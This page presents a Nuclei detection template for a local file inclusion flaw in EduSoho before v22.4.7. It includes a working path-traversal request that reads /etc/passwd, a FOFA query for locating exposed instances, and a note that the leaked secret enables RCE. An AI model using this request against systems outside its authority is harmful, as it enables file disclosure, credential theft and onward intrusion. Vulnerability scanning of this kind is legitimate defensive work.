Skip to content

EduSoho < v22.4.7 - Local File Inclusion

ID: CNVD-2023-03903

Severity: high

Author: s4e-io

Tags: cnvd,cnvd2023,lfi,edushoho

The edusoho education and training system <v22.4.7 has unauthorized file reading vulnerability. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain sensitive information such as the secret value saved in the file and database account password. After the secret value is obtained, an attacker can implement RCE with symfony _fragment routing.

id: CNVD-2023-03903
info:
name: EduSoho < v22.4.7 - Local File Inclusion
author: s4e-io
severity: high
description: |
The edusoho education and training system <v22.4.7 has unauthorized file reading vulnerability. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain sensitive information such as the secret value saved in the file and database account password. After the secret value is obtained, an attacker can implement RCE with symfony _fragment routing.
reference:
- https://blog.csdn.net/qq_41904294/article/details/135007351
- https://github.com/gobysec/GobyVuls/blob/master/CNVD-2023-03903.md
metadata:
verified: true
max-request: 1
vendor: hagzhou-kuozhi-network-technology
product: edusoho
fofa-query: title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")
tags: cnvd,cnvd2023,lfi,edushoho
http:
- raw:
- |
GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: content_type
words:
- "text/csv"
- type: status
status:
- 200
# digest: 490a004630440220519e651840157dd0d430613488d05a9fb0ffcbc63470adb56870318817232caf0220601b4c2fb5c9c93574490265cee0c57a5221507738501519d549a21e0f801ed8:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2023/CNVD-2023-03903.yaml"

View on Github